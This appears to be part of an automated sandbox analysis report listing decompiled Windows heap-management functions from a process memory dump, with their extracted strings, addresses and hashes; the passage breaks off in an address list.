0x04a53fb6
0x04aa8317
0x04aa831a
0x00000000
0x04a53fbc
0x04a53fc1
0x04a53fc9
0x04a53fd7
0x04a53fda
0x04a53fdd
0x04a54021
0x04a54021
0x04a54029
0x04a54030
0x04a54044
0x04a54046
0x04a54046
0x04a54044
0x04a54049
0x04aa8327
0x04aa8334
0x04aa8339
0x04aa833c
0x04a5404f
0x04a5404f
0x04a5404f
0x04a54051
0x04a54056
0x04a54063
0x04a54063
0x04a54068
0x00000000
0x04a54068
0x04a53fdf
0x04a53fe2
0x04a53fe4
0x04a53fe7
0x04a53fef
0x04a54003
0x04a54005
0x04a54005
0x04a5400c
0x04a54013
0x04a54016
0x04a54017
0x04a5401b
0x04a5401e
0x00000000
0x04a5401e
0x04a53fb6
0x04a53eb1
0x04a53eb4
0x04a53eb7
0x04a53ebc
0x04aa82a9
0x04aa82ab
0x04a53ec2
0x04a53ed3
0x04a53ed5
0x04a53ed8
0x04a53ed8
0x04a53edd
0x04aa82b3
0x04aa82b6
0x00000000
0x04a53ee3
0x04a53ee8
0x04a53eed
0x04a53ef0
0x04a53ef3
0x04a53f02
0x04a53f05
0x04a53f08
0x04aa82c0
0x04aa82c3
0x04aa82c5
0x04aa82c8
0x04aa82d0
0x04aa82e4
0x04aa82e6
0x04aa82e6
0x04aa82ed
0x04aa82f4
0x04aa82f7
0x04aa82f8
0x04aa82fc
0x04aa82ff
0x04aa82ff
0x04a53f0e
0x04a53f11
0x04a53f16
0x04a53f1d
0x04a53f31
0x04aa8307
0x04aa8307
0x04a53f31
0x04a53f39
0x04a53f48
0x04a53f4d
0x04a53f50
0x04a53f50
0x04a53f53
0x04a53f58
0x04a53f65
0x04a53f65
0x04a53f6a
0x00000000
0x04a53f6a
0x04a53edd
0x04a53dda
0x04a53ddd
0x04a53de0
0x04a53de5
0x04aa8245
0x04a53deb
0x04a53df7
0x04a53dfc
0x04a53dfe
0x04a53e01
0x04a53e01
0x04a53e06
0x04aa824d
0x04aa824f
0x04aa8254
0x00000000
0x04a53e0c
0x04a53e11
0x04a53e16
0x04a53e19
0x04a53e29
0x04a53e2c
0x04a53e2f
0x04aa825c
0x04aa825f
0x04aa8261
0x04aa8264
0x04aa826c
0x04aa8280
0x04aa8282
0x04aa8282
0x04aa8289
0x04aa8290
0x04aa8293
0x04aa8294
0x04aa8298
0x04aa829b
0x04aa829b
0x04a53e35
0x04a53e38
0x04a53e3d
0x04a53e44
0x04a53e58
0x04aa82a3
0x04aa82a3
0x04a53e58
0x04a53e60
0x04a53e6f
0x04a53e74
0x04a53e77
0x04a53e77
0x04a53e7a
0x04a53e7f
0x04a53e8c
0x04a53e8c
0x04a53e91
0x00000000
0x04a53e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 04A53D8C
WindowsExcludedProcs, xrefs: 04A53D6F
Kernel-MUI-Language-Allowed, xrefs: 04A53DC0
Kernel-MUI-Language-SKU, xrefs: 04A53F70
Kernel-MUI-Language-Disallowed, xrefs: 04A53E97

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 4b083377779c97c334a148464c32a9f584c0a99c339dfc20ee38f016d657ad75
Instruction ID: b45e20fd631736a4bf731dc70cfb59f64e49cd2af78d5150b4c2f964bbafd7fd
Opcode Fuzzy Hash: 4b083377779c97c334a148464c32a9f584c0a99c339dfc20ee38f016d657ad75
Instruction Fuzzy Hash: 68F14E72D10219EFDF11DF98CA40AEEBBF9FF48654F14005AE905A7260E734AE00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A440E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E04A440E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E04A4B150();
					} else {
						E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04A4B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E04A4B150(", passed to %s", _t29);
					}
					_push("\n");
					E04A4B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x4b36378 = 1;
						asm("int3");
						 *0x4b36378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x04a440e6
0x04a440e8
0x04a440f1
0x04aa042d
0x04aa044c
0x04aa0451
0x04aa042f
0x04aa0444
0x04aa0449
0x04aa045d
0x04aa0466
0x04aa046e
0x04aa0474
0x04aa0475
0x04aa047a
0x04aa048a
0x04aa048c
0x04aa0493
0x04aa0494
0x04aa0494
0x00000000
0x04aa049b
0x00000000

Strings

RtlAllocateHeap, xrefs: 04AA0468
HEAP: , xrefs: 04AA044C
Invalid heap signature for heap at %p, xrefs: 04AA0458
HEAP[%wZ]: , xrefs: 04AA043F
, passed to %s, xrefs: 04AA0469

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: dfa379a004c86eed36159ad5ad3f748969ba48ca2d061b9ad5df6e5f760d9148
Instruction ID: f60337ddb5c7109cfc1ad50b64006695bb7cb9e0f658c451ef65973990058bb9
Opcode Fuzzy Hash: dfa379a004c86eed36159ad5ad3f748969ba48ca2d061b9ad5df6e5f760d9148
Instruction Fuzzy Hash: 5B01B53624A250BFE3299F6CA60DB5A77B4EBC1B34F19806AF005476428BA9B850D521

Uniqueness

Uniqueness Score: -1.00%

Function 04A6A830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E04A6A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x4b38748 - 1;
					if( *0x4b38748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E04A4B150();
									_t260 = _t257 + 4;
								} else {
									E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E04A4B150();
								_t257 = _t260 + 4;
								__eflags =  *0x4b37bc8;
								if(__eflags == 0) {
									E04B02073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E04B0A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E04A9D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E04A6AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E04B0A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E04B0A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x4b38748 - 1;
					if( *0x4b38748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E04A4B150();
							} else {
								E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E04A4B150();
							__eflags =  *0x4b37bc8;
							if(__eflags == 0) {
								_t131 = E04B02073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x04a6a83a
0x04a6a83c
0x04a6a83e
0x04a6a841
0x04a6a844
0x04a6a84a
0x04a6aa53
0x04a6aa59
0x04a6aa59
0x04a6a858
0x04a6a85e
0x04a6aaf5
0x04a6aafc
0x04ab229e
0x04ab22a2
0x04ab22a8
0x04ab22b3
0x04ab22b5
0x04ab22bb
0x04ab22c1
0x04ab22c5
0x04ab22e6
0x04ab22eb
0x04ab22f0
0x04ab22c7
0x04ab22dc
0x04ab22e1
0x04ab22e1
0x04ab22f3
0x04ab22f8
0x04ab22fd
0x04ab2300
0x04ab2307
0x04ab230e
0x04ab230e
0x04ab2313
0x04ab2313
0x04ab22b5
0x04ab22a2
0x04a6aafc
0x04a6a864
0x04a6a869
0x04a6aa5c
0x04a6aa5e
0x04a6a86f
0x04a6a87f
0x04a6a885
0x04a6a885
0x04a6a88b
0x04a6a890
0x04a6a896
0x04a6ab0c
0x04a6ab0f
0x04a6ab15
0x04ab2320
0x04ab2320
0x04a6ab1b
0x04a6a89c
0x04a6a89f
0x04a6a8a2
0x04a6a8a2
0x04a6a8a5
0x04a6a8af
0x04a6a8b3
0x04a6a8b8
0x04a6aa66
0x04a6a8be
0x04a6a8c5
0x04a6a8c6
0x04a6a8ce
0x04ab2328
0x04ab2332
0x04ab2337
0x04ab2337
0x04a6a8ce
0x04a6a8d4
0x04a6a8d8
0x04a6a8db
0x04a6a8de
0x04a6a8e1
0x04a6a8e5
0x04a6a8e8
0x04a6a8f0
0x04a6a8f3
0x04ab234c
0x04ab2350
0x04ab2355
0x04ab2359
0x04ab2359
0x04a6a8f9
0x04a6a901
0x04a6aae4
0x04a6aae4
0x04a6aaea
0x00000000
0x04a6a907
0x04a6a90a
0x04a6a91d
0x04a6a91d
0x00000000
0x04a6a910
0x04a6a910
0x04a6a910
0x04a6a914
0x04a6a924
0x04a6a924
0x04a6a924
0x04a6a924
0x04a6a916
0x04a6a91b
0x00000000
0x00000000
0x00000000
0x04a6a91b
0x04a6a925
0x04a6a925
0x04a6a932
0x04a6a936
0x04a6a93c
0x04a6a93c
0x04a6a93c
0x04a6ab22
0x04a6ab24
0x04a6ab27
0x04a6ab27
0x04a6a942
0x04a6a944
0x04a6aaba
0x04a6aabd
0x04a6aac0
0x04a6aac0
0x04a6aac2
0x04a6ab2f
0x04a6aac4
0x04a6aac4
0x04a6aac7
0x04a6aaca
0x04a6aacc
0x04a6aace
0x04a6aace
0x04a6aace
0x04a6aad1
0x04a6aad1
0x04a6aad7
0x04a6aad9
0x00000000
0x00000000
0x04ab2361
0x04ab2369
0x04ab236b
0x00000000
0x04ab2371
0x00000000
0x04ab2371
0x00000000
0x04ab236b
0x04a6aac0
0x04a6a94a
0x04a6a94a
0x04a6a94d
0x04a6a94d
0x04a6a950
0x04a6a954
0x04ab2376
0x04ab2380
0x04a6a95a
0x04a6a95a
0x04a6a95c
0x04a6a95f
0x04a6a961
0x04a6a961
0x04a6a967
0x04a6a96a
0x04a6a972
0x04a6aa02
0x04a6aa06
0x04a6aa10
0x04a6aa16
0x04a6aa16
0x04a6aa1b
0x04a6aa21
0x04a6aa24
0x04a6aa27
0x04a6aa29
0x04a6aa2c
0x04a6aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x04a6a978
0x04a6a978
0x04a6a97b
0x04a6a981
0x04a6a996
0x04a6a998
0x04a6a99f
0x04a6a9a2
0x04ab238a
0x04a6a9a8
0x04a6a9a8
0x04a6a9a8
0x04a6a9aa
0x04a6a9ad
0x04a6a9b0
0x04a6a9bb
0x04a6a9be
0x04a6a9c7
0x04a6a9c9
0x04a6a9c9
0x04a6a9cc
0x04a6a9d1
0x04a6aa6d
0x04a6aa70
0x04a6aa73
0x04a6aa75
0x04a6aa79
0x04a6aa7e
0x04a6aa82
0x04a6aa8f
0x04a6aa94
0x04a6aa96
0x04ab2392
0x04ab23a1
0x04ab23a1
0x04a6aa9c
0x04a6aa9f
0x04a6aaa2
0x04a6aaa2
0x04a6aaa8
0x04a6aaab
0x04a6aaaf
0x00000000
0x04a6aab5
0x00000000
0x04a6aab5
0x04a6a9d7
0x04a6a9d7
0x04a6a9da
0x04a6a9e0
0x04a6a9e3
0x04a6a9e6
0x04a6a9e9
0x04a6a9eb
0x04a6a9fd
0x04a6a9fd
0x00000000
0x04a6a9eb
0x00000000
0x00000000
0x00000000
0x04a6a983
0x04a6a983
0x04a6a983
0x04a6a987
0x04a6a995
0x04a6a995
0x04a6a995
0x04a6a995
0x04a6a989
0x04a6a98e
0x00000000
0x04a6a990
0x00000000
0x04a6a990
0x04a6a98e
0x00000000
0x04a6a983
0x04a6a972
0x04a6a90a
0x04a6aa34
0x04a6aa34
0x04a6aa40
0x04a6aa43
0x04a6aa46
0x04a6aa4d
0x04ab23ab
0x04ab23b2
0x04ab23b8
0x04ab23be
0x04ab23c3
0x04ab23c5
0x04ab23cb
0x04ab23d1
0x04ab23d5
0x04ab23f6
0x04ab23fb
0x04ab23d7
0x04ab23ec
0x04ab23f1
0x04ab2403
0x04ab2408
0x04ab2410
0x04ab2417
0x04ab2422
0x04ab2422
0x04ab2417
0x04ab23c5
0x04ab23b2
0x00000000

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 04AB22F3
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 04AB2403
HEAP[%wZ]: , xrefs: 04AB22D7, 04AB23E7
HEAP: , xrefs: 04AB22E6, 04AB23F6

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 0e2e4475801938d8587be23b0da041c0e74d5f4849fcd0e9e77edb21b107b327
Instruction ID: 24b4ad74657f6c46abdbef2fa0d825b0c3bc3c5bbb6a2ef254bcf41a5ce7ec0e
Opcode Fuzzy Hash: 0e2e4475801938d8587be23b0da041c0e74d5f4849fcd0e9e77edb21b107b327
Instruction Fuzzy Hash: 35D1CF71A006459FDB18CF68C590BBAB7F1FF99300F1485AAD89AAB345E334F841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04A6A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04A6A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E04A6DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E04A89730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E04B0A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E04A89660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E04A4B150();
					} else {
						E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E04A4B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E04A67D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E04B0138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E04A67D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E04A67D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E04B01582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E04A67D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E04A67D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E04B01582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E04A9D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x04a6a229
0x04a6a231
0x04a6a23f
0x04a6a242
0x04a6a244
0x04a6a24c
0x04a6a255
0x04a6a25a
0x04a6a25f
0x04ab1c76
0x04ab1c78
0x04ab1c7e
0x04ab1c7f
0x04ab1c81
0x04ab1c82
0x04ab1c84
0x04ab1c89
0x04ab1c8b
0x04ab1c9e
0x04ab1c9e
0x04ab1cab
0x04ab1cb2
0x00000000
0x04ab1cb2
0x04ab1c8d
0x04ab1c92
0x00000000
0x00000000
0x04ab1c94
0x04ab1c98
0x00000000
0x00000000
0x00000000
0x04ab1c98
0x04a6a265
0x04a6a265
0x04a6a266
0x04a6a26f
0x04a6a270
0x04a6a276
0x04a6a277
0x04a6a279
0x04a6a27e
0x04a6a282
0x04ab1db5
0x04ab1dbb
0x04ab1dc1
0x04ab1dc5
0x04ab1de4
0x04ab1de9
0x04ab1dc7
0x04ab1ddc
0x04ab1de1
0x04ab1def
0x04ab1df3
0x04ab1df7
0x04ab1dfe
0x04ab1e06
0x04a6a302
0x04a6a308
0x04a6a308
0x04a6a288
0x04a6a28d
0x04a6a294
0x04ab1cc1
0x04a6a29a
0x04a6a29a
0x04a6a29a
0x04a6a29f
0x04ab1ccb
